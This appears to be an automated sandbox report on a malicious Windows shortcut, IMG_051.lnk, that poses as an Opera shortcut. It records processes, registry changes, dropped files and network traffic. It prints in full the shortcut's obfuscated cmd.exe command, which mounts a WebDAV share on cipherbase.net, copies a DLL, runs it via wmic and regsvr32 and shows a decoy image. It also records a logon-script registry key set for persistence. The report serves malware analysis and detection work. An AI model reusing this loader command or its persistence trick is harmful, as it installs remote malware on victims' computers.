| File name: | IMG_051.lnk |
| Full analysis: | https://app.any.run/tasks/58a22713-6a6a-47b1-9412-650f0e117922 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 10, 2025, 21:53:51 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Unicoded, NoLinkInfo, Archive, length=0, window=showminnoactive, IDListSize 0x0138, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | E968D6380FDFBE426EA1855C50ED516B |
| SHA1: | 0E62A3D5B7807375D78A02178A4B91EC0256B5E5 |
| SHA256: | A9633A007C2F4C72FFAA0A36A0BFF04E21AA7B2BA971E45124AAA4EEA6A3A37F |
| SSDEEP: | 48:8d6lmNbtm34qlClDaPIl8lGlMXlcxlaql0KXl8GlaldlklVldl5lklgl+lMldlTB:8di2m3n4gIWcUKxQqiaqGA3ufHT+6EWj |
MALICIOUS
WebDav connection (SURICATA)
- net.exe (PID: 6332)
Changes the login/logoff helper path in the registry
- regsvr32.exe (PID: 7104)
SUSPICIOUS
Executable content was dropped or overwritten
- svchost.exe (PID: 6368)
- cmd.exe (PID: 6264)
- regsvr32.exe (PID: 7104)
Abuses WebDav for code execution
- svchost.exe (PID: 6368)
Starts NET.EXE to map network drives
- cmd.exe (PID: 6264)
Uses RUNDLL32.EXE to load library
- svchost.exe (PID: 6368)
Potential Corporate Privacy Violation
- svchost.exe (PID: 6368)
Attempting to connect via WebDav
- net.exe (PID: 6332)
Uses WMIC.EXE to create a new process
- cmd.exe (PID: 6264)
Executed via WMI
- regsvr32.exe (PID: 7104)
Uses pipe srvsvc via SMB (transferring data)
- mspaint.exe (PID: 5300)
Connects to unusual port
- regsvr32.exe (PID: 7104)
INFO
Reads security settings of Internet Explorer
- net.exe (PID: 6332)
- WMIC.exe (PID: 7016)
- mspaint.exe (PID: 5300)
- cmd.exe (PID: 6264)
Creates files or folders in the user directory
- cmd.exe (PID: 6264)
Checks proxy server information
- net.exe (PID: 6332)
- mspaint.exe (PID: 5300)
Reads Microsoft Office registry keys
- cmd.exe (PID: 6264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, NoLinkInfo |
|---|---|
| FileAttributes: | Archive |
| TargetFileSize: | - |
| IconIndex: | 13 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| Description: | Opera.lnk |
| RelativePath: | ..\..\..\Windows\System32\cmd.exe |
| WorkingDirectory: | C:\Windows\System32 |
| CommandLineArguments: | /v /c "set W1KSv2gf=s^e&& !W1KSv2gf!t "eAfJ=0" &&!W1KSv2gf!t "ZrbX=1" &&!W1KSv2gf!t "UdJy=3" &&!W1KSv2gf!t "Slmf=5" &&!W1KSv2gf!t "ckVR=c" &&!W1KSv2gf!t "uIiL=i" &&!W1KSv2gf!t "lwXz=e" &&!W1KSv2gf!t "CEyC=t" &&!W1KSv2gf!t "Ytbr=@" &&!W1KSv2gf!t "IcVp=." &&!W1KSv2gf!t "bknC=o" &&!W1KSv2gf!t "RCqB=x" &&!W1KSv2gf!t "QcIp=a" &&!W1KSv2gf!t "NKgh=l" &&!W1KSv2gf!t "oeny=n" &&!W1KSv2gf!t "VqMB=_" &&!W1KSv2gf!t "adzM=k" &&!W1KSv2gf!t "fGWZ=g" &&!W1KSv2gf!t "FWAA=s" &&!W1KSv2gf!t "DFUl=r" &&!W1KSv2gf!t "OwDa=v" &&!W1KSv2gf!t "kxFeTaB5=\\!ckVR!!uIiL!ph!lwXz!rbas!lwXz!.n!lwXz!!CEyC!!Ytbr!8!eAfJ!80\api\" && c!QcIp!l!NKgh! !W1KSv2gf!t "l8tFUdn6=58!ZrbX!!eAfJ!0!IcVp!!bknC!!ckVR!!RCqB!" && ca!NKgh!!NKgh! !W1KSv2gf!t "loc!QcIp!!CEyC!i!bknC!!oeny!!VqMB!!CEyC!="%l!bknC!!ckVR!alappd!QcIp!!CEyC!!QcIp!%\Pac!adzM!a!fGWZ!es\!Slmf!8100.!bknC!cx"" && net use !kxFeTaB5! && c!bknC!py !kxFeTaB5!!l8tFUdn6! !location_t! && wm!uIiL!c proc!lwXz!!FWAA!s call c!DFUl!e!QcIp!te "re!fGWZ!s!OwDa!r!UdJy!2 /s /u !kxFeTaB5!!l8tFUdn6!" && start !kxFeTaB5!IMG.png " |
| IconFileName: | C:\Windows\System32\shell32.dll |
Total processes
135
Monitored processes
7
Malicious processes
1
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 6264 | "C:\Windows\System32\cmd.exe" /v /c "set W1KSv2gf=s^e&& !W1KSv2gf!t "eAfJ=0" &&!W1KSv2gf!t "ZrbX=1" &&!W1KSv2gf!t "UdJy=3" &&!W1KSv2gf!t "Slmf=5" &&!W1KSv2gf!t "ckVR=c" &&!W1KSv2gf!t "uIiL=i" &&!W1KSv2gf!t "lwXz=e" &&!W1KSv2gf!t "CEyC=t" &&!W1KSv2gf!t "Ytbr=@" &&!W1KSv2gf!t "IcVp=." &&!W1KSv2gf!t "bknC=o" &&!W1KSv2gf!t "RCqB=x" &&!W1KSv2gf!t "QcIp=a" &&!W1KSv2gf!t "NKgh=l" &&!W1KSv2gf!t "oeny=n" &&!W1KSv2gf!t "VqMB=_" &&!W1KSv2gf!t "adzM=k" &&!W1KSv2gf!t "fGWZ=g" &&!W1KSv2gf!t "FWAA=s" &&!W1KSv2gf!t "DFUl=r" &&!W1KSv2gf!t "OwDa=v" &&!W1KSv2gf!t "kxFeTaB5=\\!ckVR!!uIiL!ph!lwXz!rbas!lwXz!.n!lwXz!!CEyC!!Ytbr!8!eAfJ!80\api\" && c!QcIp!l!NKgh! !W1KSv2gf!t "l8tFUdn6=58!ZrbX!!eAfJ!0!IcVp!!bknC!!ckVR!!RCqB!" && ca!NKgh!!NKgh! !W1KSv2gf!t "loc!QcIp!!CEyC!i!bknC!!oeny!!VqMB!!CEyC!="%l!bknC!!ckVR!alappd!QcIp!!CEyC!!QcIp!%\Pac!adzM!a!fGWZ!es\!Slmf!8100.!bknC!cx"" && net use !kxFeTaB5! && c!bknC!py !kxFeTaB5!!l8tFUdn6! !location_t! && wm!uIiL!c proc!lwXz!!FWAA!s call c!DFUl!e!QcIp!te "re!fGWZ!s!OwDa!r!UdJy!2 /s /u !kxFeTaB5!!l8tFUdn6!" && start !kxFeTaB5!IMG.png " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6272 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6332 | net use \\cipherbase.net@8080\api\ | C:\Windows\System32\net.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6368 | C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: LOCAL SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7016 | wmic process call create "regsvr32 /s /u \\cipherbase.net@8080\api\58100.ocx" | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7104 | regsvr32 /s /u \\cipherbase.net@8080\api\58100.ocx | C:\Windows\System32\regsvr32.exe | WmiPrvSE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5300 | "C:\WINDOWS\system32\mspaint.exe" "\\cipherbase.net@8080\api\IMG.png" | C:\Windows\System32\mspaint.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Paint Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
3 420
Read events
3 418
Write events
2
Delete events
0
Modification events
| (PID) Process: | (7104) regsvr32.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | write | Name: | UserInitMprLogonScript |
Value: regsvr32 /s /i "C:\Users\admin\AppData\Local\Packages\1012380.ocx" | |||
| (PID) Process: | (6264) cmd.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids |
| Operation: | write | Name: | pngfile |
Value: | |||
Executable files
3
Suspicious files
0
Text files
1
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6368 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{86DCDDEA-239B-41E8-AB9A-A23C8EB19347}.ocx | executable | |
MD5:A87FC5F4F420D5D6768D24078142239B | SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0 | |||
| 6264 | cmd.exe | C:\Users\admin\AppData\Local\Packages\58100.ocx | executable | |
MD5:A87FC5F4F420D5D6768D24078142239B | SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0 | |||
| 7104 | regsvr32.exe | C:\Users\admin\AppData\Local\Packages\1012380.ocx | executable | |
MD5:A87FC5F4F420D5D6768D24078142239B | SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0 | |||
| 6368 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{D6C8804E-E59A-4D93-A37D-E0631F0D0255}.png | image | |
MD5:B4BD7C73D4D5DD13F16B6ED937F79634 | SHA256:14BF2860F5642E285CDC56C80209FA96F460BAD1AA69998B548F3B3BB77CDD89 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
41
DNS requests
12
Threats
7
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6332 | net.exe | OPTIONS | 200 | 195.85.115.147:8080 | http://cipherbase.net:8080/ | unknown | — | — | — |
6368 | svchost.exe | OPTIONS | 200 | 195.85.115.147:8080 | http://cipherbase.net:8080/api | unknown | — | — | — |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6368 | svchost.exe | PROPFIND | 207 | 195.85.115.147:8080 | http://cipherbase.net:8080/api | unknown | — | — | — |
6368 | svchost.exe | PROPFIND | 207 | 195.85.115.147:8080 | http://cipherbase.net:8080/api | unknown | — | — | — |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6368 | svchost.exe | PROPFIND | 207 | 195.85.115.147:8080 | http://cipherbase.net:8080/api/58100.ocx | unknown | — | — | — |
6368 | svchost.exe | PROPFIND | 207 | 195.85.115.147:8080 | http://cipherbase.net:8080/api/58100.ocx | unknown | — | — | — |
6368 | svchost.exe | PROPFIND | 207 | 195.85.115.147:8080 | http://cipherbase.net:8080/api/58100.ocx | unknown | — | — | — |
6368 | svchost.exe | GET | 200 | 195.85.115.147:8080 | http://cipherbase.net:8080/api/58100.ocx | unknown | — | — | — |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5156 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
6332 | net.exe | 195.85.115.147:8080 | cipherbase.net | — | US | unknown |
1176 | svchost.exe | 20.190.160.14:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
1076 | svchost.exe | 23.35.238.131:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted |
6368 | svchost.exe | 195.85.115.147:8080 | cipherbase.net | — | US | unknown |
7104 | regsvr32.exe | 195.85.115.184:8082 | swisskernel.com | — | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
ocsp.digicert.com |
| whitelisted |
cipherbase.net |
| unknown |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
swisskernel.com |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Not Suspicious Traffic | INFO [ANY.RUN] Websocket Upgrade Request |
— | — | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
— | — | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
— | — | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
2 ETPRO signatures available at the full report